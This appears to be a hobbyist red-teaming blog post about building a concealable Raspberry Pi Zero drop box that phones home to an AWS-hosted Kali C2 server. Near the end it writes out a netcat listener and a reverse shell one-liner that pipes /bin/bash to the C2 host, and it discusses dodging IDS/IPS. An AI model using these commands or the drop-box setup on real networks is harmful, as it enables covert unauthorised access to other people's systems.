Share this post You might be wondering why it took me so long. It’s better to be late than never, but hey! I’m now a bit obsessed with the things and have become a problem-solver, always looking for the next cool project. This was the inspiration for my latest project. Let me tell you.
The big idea
I wanted to do something with a Ras Pi Zero that would incorporate my love for red-teaming/offensive security, and I wanted it to take as many paths of least resistance as possible, and it couldn’t be super expensive ($50-ish USD). Once I had the basic parameters set, I was able to come up with the problem. Think, think, think…
It’s mine! Ras Pi Zero is small and easy to conceal. You could even use it as an “insider threat device” that can…
Drop off the target at the site
Connect via an ethernet cable, or wifi
You can be powered by USB or powerpack
Auto-connect to Command-and-Control(C2) server
Accessible via mobile devices like smart phones
Full Linux with pentesting tools
Now, I can already hear some people saying it.
“Doesn’t Hak5 make that?”
They do! It’s called a LAN Turtle, and it’s an amazing product (I own two). As I mentioned, I am a solution-seeker. Even though there are already solutions, it doesn’t mean that I can’t create my own. The fun part of it all for me is the building, the striving, the learning and the creation of something unique to my way of doing business. This project was all of those things, I can assure you.
Before I bought gear, I had to ensure that I could get it to work. I then looked at what I had already got (remember, we’re hitting the ‘easy button’ as often as possible). It was my laptop.
I need to obtain a shell from a device within a NATed/firewalled network. I can also get the shell from my mobile device from anywhere in the world. It made sense to encrypt the communication to keep it secure from prying eyes, and possibly even avoid IDS/IPS detection.
I initially thought about using SSH but wasn’t sure how to get the device’s internal IP address. What if I had NATing to deal with? It would be too difficult to connect from the outside in. This means that I must connect from the inside, out to mobile. That shouldn’t be too difficult. I could use netcat to push a Shell to my mobile. But then, I need to set up a way for the Ras Pi find my mobile IP. This means I have the exact same problem in reverse. At this point, I realized that I needed an Internet-facing device with static IP. This would be the “bridge” between the Ras Pi and my mobile phone, allowing them to communicate with each other. Here’s an illustration of the topology.
Demonstration of concept
The idea is to create an EC2 instance in AWS that acts as my ‘bridge’, or perhaps a C2 server. But it will do both jobs. Amazon account is what I already have so it was the easiest way to get an internet-facing device up and running in a short time and at a very affordable price.
I chose the Kali AMI from Amazon Marketplace. I configured it as a micro t2 and it is currently running $0.012/hr. I also needed to provision it using an ‘Elastic IP. This static IP can be obtained from AWS for free if it is connected to an instance running. It costs $0.006/hr if the instance isn’t running (or the interface isn’t associated with the IP).
After the instance was launched, I connected via SSH and ran updates. I also changed the default root/user passwords. To allow for incoming shell connections, I needed to open a port in the AWS firewall. Port 443 was chosen because it is standard internet traffic that won’t be blocked by firewalls. It took approximately 20-30 minutes to complete all of this work.
Next, I wanted to test if I could make an netcat reverse shell connection between my laptop and the C2 server. I will be using ‘ncat’ for what I am doing, not the more traditional ‘netcat/nc’. I had to install them both on my C2 Kali instance and my laptop’s WSL Kali instances.
Once that was done in AWS, I ran…
+–(kaliKIS kali)-[~]+-$ sudo nc -nvlp 443Ncat: Version 7.91 ( https://nmap.org/ncat )Ncat: Listening on :::443Ncat: Listening on 0.0.0.0:443
Then, I ran from my laptop WSL Kali…
dl[email protected]:~$ nc -nv [C2-Elastic-IP] 443 -e /bin/bash
I look back at my C2SSH terminal and find…
Ncat: Connection to [Laptop IP]Ncat: Connection to [Laptop IP]:1917